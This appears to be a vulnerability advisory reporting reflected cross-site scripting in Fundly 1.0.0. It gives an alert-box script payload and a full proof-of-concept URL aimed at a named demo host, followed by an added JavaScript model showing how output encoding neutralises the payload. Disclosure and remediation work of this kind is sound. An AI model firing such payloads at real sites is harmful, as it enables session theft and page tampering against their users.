Fundly version 1.0.0 suffers from a cross site scripting vulnerability.
0a01bb2c9a2d1fadf76ab85600d1d06ec2398b15378af4b137d16d293ad51c6a
============================================================================================================================
| # Title : Fundly 1.0.0 XSS Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : Windows 10 Français V.(Pro) |
| # Version : 1.0.0 |
| # Vendor : https://codecanyon.net/item/fundly-a-donation-platform/21225201?s_rank=4 |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Dorking in Google or other search engine
[+] in Search box use payload : <script>alert(/indoushka/);</script>
http://fundly.techvill.net/search?keyword=1%3C/title%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
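Added example (not part of the original advisory and not Fundly's code): a minimal model of a search page that reflects the keyword parameter, showing why the PoC's closing </title> takes effect when the value is written unencoded and how HTML-encoding at output neutralises it. The template, the function names and the assumption that the keyword lands inside <title> are illustrative.

```javascript
// Constructed model of a search page; NOT Fundly's source code.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change HTML parsing state.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// "Before": keyword concatenated as-is (the behaviour the PoC relies on).
function renderSearchUnsafe(keyword) {
  return `<html><head><title>Search: ${keyword}</title></head>` +
         `<body><h1>Results for ${keyword}</h1></body></html>`;
}

// "After": the same template with the keyword encoded at every sink.
function renderSearchSafe(keyword) {
  const k = escapeHtml(keyword);
  return `<html><head><title>Search: ${k}</title></head>` +
         `<body><h1>Results for ${k}</h1></body></html>`;
}

// Decode the query string the way a web framework does before templating.
function keywordFromUrl(url) {
  return new URL(url).searchParams.get('keyword') || '';
}

// True if the page contains a <script> element or more than one </title>,
// i.e. the reflected value changed the document structure.
function hasInjectedMarkup(html) {
  const titleCloses = (html.match(/<\/title>/gi) || []).length;
  return /<script\b/i.test(html) || titleCloses > 1;
}

// PoC URL exactly as given in the advisory, used here as the test input.
const POC_URL = 'http://fundly.techvill.net/search?keyword=' +
  '1%3C/title%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E';

const pocKeyword = keywordFromUrl(POC_URL);
console.log('unencoded output altered:', hasInjectedMarkup(renderSearchUnsafe(pocKeyword)));
console.log('encoded output altered:  ', hasInjectedMarkup(renderSearchSafe(pocKeyword)));
```
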
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================